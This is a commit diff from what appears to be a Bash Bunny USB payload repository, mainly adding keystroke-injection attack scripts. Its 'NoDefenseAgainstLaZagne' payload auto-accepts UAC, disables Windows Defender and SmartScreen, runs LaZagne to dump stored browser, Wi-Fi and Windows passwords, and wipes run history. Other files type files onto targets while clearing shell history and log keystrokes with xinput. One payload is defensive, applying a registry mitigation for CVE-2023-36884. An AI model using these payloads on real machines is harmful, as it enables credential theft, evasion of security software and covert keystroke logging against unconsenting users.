Compare commits
31 Commits
8b35d04ee5
...
f4513c02ed
Author | SHA1 | Date |
---|---|---|
Aleff | f4513c02ed | |
Peaks | 9bc2a0312d | |
Rafa Guillermo | f7cf46fd95 | |
Rafa Guillermo | 774cc77212 | |
Rafa Guillermo | 5da19abe97 | |
Rafa Guillermo | b1cf7e8ef4 | |
Rafa Guillermo | 9bcb7f9240 | |
Rafa Guillermo | bf149a783b | |
Rafa Guillermo | bc36c76444 | |
Rafa Guillermo | 6a260cfd4b | |
Peaks | 8d901a02a8 | |
Peaks | 14fa7c490e | |
Peaks | 2559d728b1 | |
Aleff | 47cf3bde11 | |
Aleff | 9b9dfe8045 | |
Aleff | 617aa0a25f | |
Aleff | 55242ea4cf | |
Aleff | 87354048c8 | |
aleff-github | ac02af58f4 | |
aleff-github | 0adde48233 | |
Aleff | d6bae24975 | |
TheDragonkeeper | 963c000ab9 | |
bg-wa | a479964196 | |
bg-wa | 17e0b3d50c | |
bg-wa | 5f06649cd2 | |
bg-wa | 9ab8820cc5 | |
bg-wa | b3b9f75200 | |
bg-wa | 5c764849f3 | |
bg-wa | afdafb27d6 | |
bg-wa | 821105a6a3 | |
bg-wa | 31ae33e78a |
|
@ -0,0 +1,103 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# DROP v1 by bg-wa
|
||||||
|
# Simplifies dropping files from HID attacks for LINUX
|
||||||
|
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
|
||||||
|
#
|
||||||
|
# Example:
|
||||||
|
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
|
||||||
|
source ./run.sh
|
||||||
|
|
||||||
|
function DROP() {
|
||||||
|
os=$1
|
||||||
|
source=$2
|
||||||
|
destination=$3
|
||||||
|
overwrite=$4
|
||||||
|
executable=$5
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
RUN WIN powershell
|
||||||
|
;;
|
||||||
|
OSX)
|
||||||
|
RUN OSX terminal
|
||||||
|
;;
|
||||||
|
UNITY)
|
||||||
|
RUN UNITY terminal
|
||||||
|
;;
|
||||||
|
LINUX)
|
||||||
|
RUN LINUX terminal
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
RUN UNITY terminal
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
QUACK DELAY 1000
|
||||||
|
|
||||||
|
if "$overwrite" == "true"
|
||||||
|
then
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK STRING del "$destination"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK STRING rm "$destination"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK STRING fsutil file createnew "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING notepad.exe "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 1000
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK STRING vi "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING i
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
while IFS= read -r data
|
||||||
|
do
|
||||||
|
QUACK STRING "$data"
|
||||||
|
QUACK ENTER
|
||||||
|
done < "$source"
|
||||||
|
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK CTRL s
|
||||||
|
QUACK CRTL x
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK ESC
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING :wq
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
if "$executable" == "true"
|
||||||
|
then
|
||||||
|
QUACK STRING chmod +x "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
QUACK STRING history -c
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f DROP
|
|
@ -0,0 +1,126 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# Quickly get to a prompt on any platform with the BashBunny
|
||||||
|
#
|
||||||
|
# How this works?
|
||||||
|
# 1) Once the library is included in your payload, launch terminal\powershell\run
|
||||||
|
# with:
|
||||||
|
# PROMPT [OS]
|
||||||
|
# 2) OS options are:
|
||||||
|
# "AUTO" : Default - Hak5 2124 cross platform code
|
||||||
|
# "UNITY" : Launches Terminal in Unity
|
||||||
|
# "UNITY_RUN" : Opens run prompt in Unity
|
||||||
|
# "MAC" : Launches Terminal in OSX
|
||||||
|
# "POWERSHELL" : Launches Powershell in Windows
|
||||||
|
# "WINDOWS_RUN": Opens run prompt in Windows
|
||||||
|
# 3) To close a prompt use:
|
||||||
|
# CLOSE_PROMPT [OS]
|
||||||
|
################################################################################
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# Start HID Prompt
|
||||||
|
################################################################################
|
||||||
|
|
||||||
|
|
||||||
|
function PROMPT() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
OS="AUTO"
|
||||||
|
else
|
||||||
|
OS=$1
|
||||||
|
fi
|
||||||
|
|
||||||
|
#AUTO
|
||||||
|
if [ "${OS}" = "AUTO" ]; then
|
||||||
|
LED G B 100
|
||||||
|
QUACK ALT F2
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK GUI SPACE
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK GUI r
|
||||||
|
clear_active_input
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#UNITY
|
||||||
|
if [ "${OS}" = "UNITY" ]; then
|
||||||
|
LED R B 100
|
||||||
|
QUACK GUI
|
||||||
|
clear_active_input
|
||||||
|
QUACK STRING terminal
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#UNITY_RUN
|
||||||
|
if [ "${OS}" = "UNITY_RUN" ]; then
|
||||||
|
LED R B 100
|
||||||
|
QUACK ALT F2
|
||||||
|
fi
|
||||||
|
|
||||||
|
#MAC
|
||||||
|
if [ "${OS}" = "MAC" ]; then
|
||||||
|
LED R B G 100
|
||||||
|
QUACK GUI SPACE
|
||||||
|
clear_active_input
|
||||||
|
QUACK STRING terminal
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#POWERSHELL
|
||||||
|
if [ "${OS}" = "POWERSHELL" ]; then
|
||||||
|
LED B 100
|
||||||
|
QUACK GUI
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK powershell
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#WINDOWS_RUN
|
||||||
|
if [ "${OS}" = "WINDOWS_RUN" ]; then
|
||||||
|
LED B 100
|
||||||
|
QUACK GUI r
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
LED 0
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function CLOSE_PROMPT() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
QUACK ALT F4
|
||||||
|
else
|
||||||
|
if [ "$1" = "MAC" ]; then
|
||||||
|
QUACK GUI w
|
||||||
|
else
|
||||||
|
QUACK ALT F4
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# HELPER FUNCTIONS
|
||||||
|
function wait_enter_wait() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
BEFORE_WAIT=100
|
||||||
|
else
|
||||||
|
BEFORE_WAIT=$1
|
||||||
|
fi
|
||||||
|
if [ -z "$2" ]; then
|
||||||
|
AFTER_WAIT=100
|
||||||
|
else
|
||||||
|
AFTER_WAIT=$2
|
||||||
|
fi
|
||||||
|
|
||||||
|
QUACK DELAY ${BEFORE_WAIT}
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY ${AFTER_WAIT}
|
||||||
|
}
|
||||||
|
|
||||||
|
function clear_active_input() {
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK BACKSPACE
|
||||||
|
QUACK DELAY 100
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f PROMPT
|
||||||
|
export -f CLOSE_PROMPT
|
|
@ -0,0 +1,118 @@
|
||||||
|
# Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability
|
||||||
|
|
||||||
|
This script allows you to set the Register Key block rule that will allow you to defend against CVE-2023-36884.
|
||||||
|
|
||||||
|
**Category**: Incident Response
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Payload Description](#payload-description)
|
||||||
|
- [CVE-2023-36884 Description](#cve-2023-36884-description)
|
||||||
|
- [Summary](#summary)
|
||||||
|
- [Note](#note)
|
||||||
|
- [Dependencies](#dependencies)
|
||||||
|
- [Settings](#settings)
|
||||||
|
- [Administrative Privileges](#administrative-privileges)
|
||||||
|
- [Set the rule](#set-the-rule)
|
||||||
|
- [See the new rule](#see-the-new-rule)
|
||||||
|
- [Remove the rule](#remove-the-rule)
|
||||||
|
- [Credits](#credits)
|
||||||
|
|
||||||
|
## Payload Description
|
||||||
|
|
||||||
|
This script allows you to set the Register Key block rule that will allow you to defend against CVE-2023-36884.
|
||||||
|
|
||||||
|
Open a PowerShell, set the Register Key block rule trough the [command line interface](https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3).
|
||||||
|
|
||||||
|
|
||||||
|
![](https://i.ibb.co/g7Tj3fV/2.png)
|
||||||
|
|
||||||
|
## CVE-2023-36884 Description
|
||||||
|
|
||||||
|
### Summary
|
||||||
|
|
||||||
|
Microsoft is investigating reports of a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents.
|
||||||
|
|
||||||
|
An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.
|
||||||
|
|
||||||
|
Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This might include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.
|
||||||
|
|
||||||
|
Please see the Microsoft Threat Intelligence [Blog Entry](https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/) for important information about steps you can take to protect your system from this vulnerability.
|
||||||
|
|
||||||
|
This CVE will be updated with new information and links to security updates when they become available. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this CVE. See [Microsoft Technical Security Notifications](https://www.microsoft.com/en-us/msrc/technical-security-notifications?rtc=1) and [Security Update Guide Notification System News: Create your profile now – Microsoft Security Response Center](https://msrc.microsoft.com/blog/2022/08/security-update-guide-notification-system-news-create-your-profile-now/).
|
||||||
|
|
||||||
|
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
|
||||||
|
|
||||||
|
### Note
|
||||||
|
|
||||||
|
Tested on:
|
||||||
|
- Windows 11 Eng
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* ExecutionPolicy Bypass
|
||||||
|
|
||||||
|
## Settings
|
||||||
|
|
||||||
|
In this payload, I created a new registry key called "FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION." All of the following application names are then added as a value of type REG_DWORD with data 1.
|
||||||
|
|
||||||
|
- Excel.exe
|
||||||
|
- Graph.exe
|
||||||
|
- MSAccess.exe
|
||||||
|
- MSPub.exe
|
||||||
|
- Powerpnt.exe
|
||||||
|
- Visio.exe
|
||||||
|
- WinProj.exe
|
||||||
|
- WinWord.exe
|
||||||
|
- Wordpad.exe
|
||||||
|
|
||||||
|
Remember that you must run PowerShell with administrative privileges to create and manage registry keys.
|
||||||
|
|
||||||
|
### Administrative Privileges
|
||||||
|
|
||||||
|
- I used the Payload [Starting a PowerShell with administrator permissions in Windows 10/11](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows) by Hak5 Payloads
|
||||||
|
|
||||||
|
```
|
||||||
|
DELAY 1000
|
||||||
|
GUI x
|
||||||
|
DELAY 500
|
||||||
|
STRING a
|
||||||
|
DELAY 500
|
||||||
|
LEFT_ARROW
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
```
|
||||||
|
|
||||||
|
### Set the rule
|
||||||
|
|
||||||
|
![](https://i.ibb.co/XZB8NDJ/1.png)
|
||||||
|
|
||||||
|
### See the new rule
|
||||||
|
|
||||||
|
![](https://i.ibb.co/g7Tj3fV/2.png)
|
||||||
|
|
||||||
|
### Remove the rule
|
||||||
|
|
||||||
|
![](https://i.ibb.co/jRLj8j3/3.png)
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center">Aleff</h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/aleff-github">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Linkedin
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,106 @@
|
||||||
|
#######################################################################################################################
|
||||||
|
# #
|
||||||
|
# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
|
||||||
|
# Author : Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Incident Response #
|
||||||
|
# Target : Windows 10/11 #
|
||||||
|
# #
|
||||||
|
#######################################################################################################################
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
|
||||||
|
# PlugAndPlay <3
|
||||||
|
|
||||||
|
# Requirements:
|
||||||
|
# - ExecutionPolicy Bypass
|
||||||
|
|
||||||
|
# Impact: Remote Code Execution
|
||||||
|
# Max Severity: Important
|
||||||
|
|
||||||
|
# Mitigation:
|
||||||
|
# - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
|
||||||
|
# - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as 'Office and Windows HTML Remote Code Execution Vulnerability' (CVE-2023-36884).
|
||||||
|
# The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
|
||||||
|
|
||||||
|
# It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
|
||||||
|
|
||||||
|
# Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
|
||||||
|
|
||||||
|
QUACK DELAY 1000
|
||||||
|
QUACK GUI x
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING a
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK LEFTARROW
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
# Sets the path to the registry key
|
||||||
|
QUACK STRING \$registryPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION'
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
# Array of application names
|
||||||
|
QUACK STRING \$applicationNames = @(
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'Excel.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'Graph.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'MSAccess.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'MSPub.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'Powerpnt.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'Visio.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'WinProj.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'WinWord.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'Wordpad.exe'
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING )
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
# Create the registry key if it does not already exist
|
||||||
|
QUACK STRING if (!(Test-Path \$registryPath)) {
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING New-Item -Path \$registryPath -Force # Out-Null
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo 'Registry key created'
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING }
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
# Add the values to the registry key
|
||||||
|
QUACK STRING foreach (\$appName in \$applicationNames) {
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING Set-ItemProperty -Path \$registryPath -Name \$appName -Value 1 -Type DWORD -Force # Out-Null
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo '[+] \$appName'
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING }
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
|
@ -0,0 +1,6 @@
|
||||||
|
$drivelabel = 'BashBunny'
|
||||||
|
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
|
||||||
|
$filter = 'password_'+ $env:COMPUTERNAME
|
||||||
|
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
|
||||||
|
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
|
||||||
|
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
|
@ -0,0 +1,90 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: Disable Windows Defender and Exfil stored passwords
|
||||||
|
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
|
||||||
|
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
|
||||||
|
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||||
|
# Author: rafa-guillermo
|
||||||
|
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||||
|
# Version: 1.2
|
||||||
|
# Category: Credentials
|
||||||
|
# Target: Windows
|
||||||
|
# Tested On: Windows 11
|
||||||
|
# Attackmodes: HID, STORAGE
|
||||||
|
|
||||||
|
# Options
|
||||||
|
LOOTDIR=/root/udisk/loot/PasswordGrabber
|
||||||
|
|
||||||
|
######## Set-up ########
|
||||||
|
LED SETUP
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
DRIVE_LABEL=BashBunny
|
||||||
|
|
||||||
|
######## Make Loot Dir ########
|
||||||
|
# Setup named logs in loot directory
|
||||||
|
mkdir -p $LOOTDIR
|
||||||
|
|
||||||
|
####### Open a powershell window with elevated privileges #######
|
||||||
|
LED STAGE1
|
||||||
|
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
||||||
|
sleep 3 # wait for UAC prompt
|
||||||
|
QUACK ALT y
|
||||||
|
sleep 2
|
||||||
|
|
||||||
|
# Disable Windows Defender File Scan and and Real Time Protection
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 1
|
||||||
|
|
||||||
|
# Run laZagne
|
||||||
|
LED STAGE2
|
||||||
|
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING \& \$scriptPath
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 10
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
|
||||||
|
# Re-enable Defender and Smart screen
|
||||||
|
LED CLEANUP
|
||||||
|
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
||||||
|
sleep 3 # wait for UAC prompt
|
||||||
|
QUACK ALT y
|
||||||
|
sleep 2
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 1
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
######## FINISH ########
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,39 @@
|
||||||
|
# NoDefenseAgainstLaZagne
|
||||||
|
|
||||||
|
* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
|
||||||
|
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||||
|
* Version: 1.0
|
||||||
|
* Frimware support: 1.1 and higher
|
||||||
|
* Target version: Windows 11
|
||||||
|
* Tested on: Windows 11
|
||||||
|
|
||||||
|
## Description
|
||||||
|
Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||||
|
|
||||||
|
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
|
||||||
|
Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
|
||||||
|
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
|
||||||
|
3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
|
||||||
|
4. Plug your BashBunny and Enjoy
|
||||||
|
|
||||||
|
|
||||||
|
## Info
|
||||||
|
rafa-guillermo: I've added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, I was having issues where otherwise it would immediately be quarantined. Defender will be enabled again after execution.
|
||||||
|
|
||||||
|
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
|
||||||
|
|
||||||
|
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
|
||||||
|
|
||||||
|
## Disclaimer
|
||||||
|
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
|
||||||
|
|
||||||
|
## Led status
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
|-----------------------------------------------|--------|
|
||||||
|
| Magenta solid | Setup |
|
||||||
|
| Yellow single blink | Attack |
|
||||||
|
| Green 1000ms VERYFAST blink followed by SOLID | Finish |
|
|
@ -0,0 +1,7 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Wake up and do something productive here instead...
|
||||||
|
sleep 10
|
||||||
|
|
||||||
|
# boom!!
|
||||||
|
firefox "http://hak5.org"
|
|
@ -0,0 +1,30 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: The Ol'Drop'n'Run
|
||||||
|
# Author: bg-wa
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: HID
|
||||||
|
# Target: UNITY
|
||||||
|
# Attackmodes: HID
|
||||||
|
#
|
||||||
|
# Quick HID only attack to write a file to target machine and open
|
||||||
|
#
|
||||||
|
# | Attack Stage | Description |
|
||||||
|
# | ------------------- | ---------------------------------------- |
|
||||||
|
# | SETUP | Open vi |
|
||||||
|
# | ATTACK | Writing files |
|
||||||
|
# | FINISH | Payload Dropped & ran (remove the bunny) |
|
||||||
|
#
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
|
||||||
|
target_script=\~/fuse.sh
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
DROP $source_script $target_script true true
|
||||||
|
RUN UNITY $target_script
|
||||||
|
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,20 @@
|
||||||
|
#/bin/bash
|
||||||
|
checkonbunny() {
|
||||||
|
mybunny=$(lsblk -p -S -o NAME,SERIAL | grep $BunnyID | awk '{print $1}')
|
||||||
|
mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
|
||||||
|
if [ -d $mybunny ]; then
|
||||||
|
bashbunnyloot=$mybunny"/loot"
|
||||||
|
mapfile=$bashbunnyloot"/maps"
|
||||||
|
keyfile=$bashbunnyloot"/keys"
|
||||||
|
startwork
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
startwork(){
|
||||||
|
getdevicetouse=${getdevicetouse#"id="}
|
||||||
|
xinput --test $getdevicetouse > $keyfile &
|
||||||
|
xmodmap -pke > $mapfile
|
||||||
|
}
|
||||||
|
BunnyID="ch000001"
|
||||||
|
bashbunnyloot=''
|
||||||
|
